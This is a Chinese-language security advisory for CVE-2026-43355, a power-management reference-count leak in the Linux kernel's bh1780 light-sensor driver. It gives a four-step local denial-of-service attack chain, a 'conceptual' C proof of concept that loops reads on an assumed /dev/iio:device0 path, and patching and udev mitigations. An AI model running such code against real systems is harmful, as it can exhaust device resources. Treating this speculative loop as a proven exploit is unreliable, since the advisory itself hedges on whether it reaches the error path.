CVE-2026-43355 CVSS 5.5 中危

CVE-2026-43355 Linux内核bh1780驱动资源泄漏漏洞

披露日期: 2026-05-08

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43355

漏洞类型

资源管理错误

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的bh1780光照传感器驱动程序存在一处资源管理漏洞。在读取操作发生错误时，驱动程序未能正确执行电源管理（PM）运行时的引用计数递减操作，导致PM资源泄漏。本地低权限攻击者可利用此漏洞，通过反复触发错误路径耗尽系统资源，从而造成系统可用性受损及拒绝服务。

技术细节

该漏洞位于Linux内核的`drivers/iio/light/bh1780.c`驱动程序中。核心问题在于电源管理（PM）运行时引用计数的错误处理逻辑缺陷。在驱动程序的读取函数中，代码首先调用`pm_runtime_get_sync()`来增加设备的引用计数并确保设备处于唤醒状态。然而，如果随后的读取操作失败（例如返回错误码），代码会直接跳转到错误处理路径并返回，而未调用相应的`pm_runtime_put_autosuspend()`函数来递减引用计数。这种不平衡导致了PM运行时引用计数的永久性泄漏。长期来看，这会阻止系统进入低功耗状态，甚至导致设备锁死，从而引发拒绝服务。攻击者只需拥有本地低权限，通过不断触发读取错误路径即可利用此漏洞。

攻击链分析

STEP 1

步骤1：本地访问

攻击者获取目标系统的本地低权限账户访问权限。

STEP 2

步骤2：触发驱动错误

攻击者编写程序或使用工具，反复向受影响的bh1780光照传感器驱动发起读取请求。

STEP 3

步骤3：资源泄漏

当读取操作在驱动内部触发错误路径时，由于代码缺陷，电源管理（PM）运行时引用计数未被正确释放。

STEP 4

步骤4：拒绝服务

随着泄漏累积，系统电源管理资源耗尽，导致设备无法正常工作或系统挂起，造成拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-43355 (Conceptual)
 * This code attempts to trigger the error path in the bh1780 driver.
 * It assumes the attacker has local access and permission to read the device.
 */

#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>

#define DEVICE_PATH "/dev/iio:device0" // Example path, may vary

int main() {
    int fd;
    char buffer[256];
    ssize_t bytes_read;

    printf("[+] Attempting to open %s...\n", DEVICE_PATH);
    fd = open(DEVICE_PATH, O_RDONLY);
    if (fd < 0) {
        perror("[-] Failed to open device");
        return 1;
    }

    printf("[+] Device opened. Triggering error path...\n");

    // Loop to trigger the read operation repeatedly.
    // Depending on hardware state, reads might fail or hit the error path.
    for (int i = 0; i < 1000; i++) {
        bytes_read = read(fd, buffer, sizeof(buffer));
        if (bytes_read < 0) {
            // Error encountered in driver logic.
            // Vulnerable driver skips pm_runtime_put_autosuspend here.
            printf("Iteration %d: Read failed (errno=%d), potential leak triggered.\n", i, errno);
        }
    }

    close(fd);
    printf("[+] Exploitation attempt finished.\n");
    return 0;
}

影响范围

Linux Kernel (修复提交之前)

防御指南

临时缓解措施

建议立即将Linux内核更新至最新版本，以包含针对CVE-2026-43355的修复补丁。如果无法立即升级，应通过系统权限控制（如udev规则）限制对受影响设备节点的访问，仅允许受信任的用户或进程进行交互，从而降低被攻击的风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表